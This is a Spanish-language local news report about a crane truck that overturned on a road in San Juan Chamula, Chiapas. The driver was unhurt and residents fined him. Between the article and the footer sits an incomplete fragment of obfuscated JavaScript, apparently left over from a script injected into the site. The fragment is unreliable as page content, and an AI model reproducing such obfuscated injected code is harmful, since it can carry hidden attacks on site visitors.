Vuelca grúa en San Juan Chamula

Óscar Gómez

San Juan Chamula.- Quizá por manejar a exceso de velocidad o por las condiciones de la carretera, un vehículo Grúa Articulada Tipo Hiab Marca Cormach de color roja de modelo atrasado, se salió de la carretera sobre el tramo carretero Cabecera San Juan Chamula a la comunidad Cruz Quemada del mismo municipio.

Según los curiosos, el conductor “traía unas copitas encima”, se ignora hacia dónde se dirigía, pero afortunadamente, solo fueron daños materiales, ya que el conductor de la pesada unidad, resultó ileso.

Otra grúa fue la encargada de sacar a la pesada unidad, con el apoyo de los pobladores de la comunidad, quienes le impusieron una multa, cantidad que no fue informada, que argumentaron, sería para el apoyo económico de quienes ayudaron.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Particular embiste a motociclista en la Calzada Samuel León Brindis

Jairo Camacho. Agencia ReporteCiudadano, 15 de diciembre del 2025. Tuxtla Gutiérrez.- Este viernes un motociclista …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *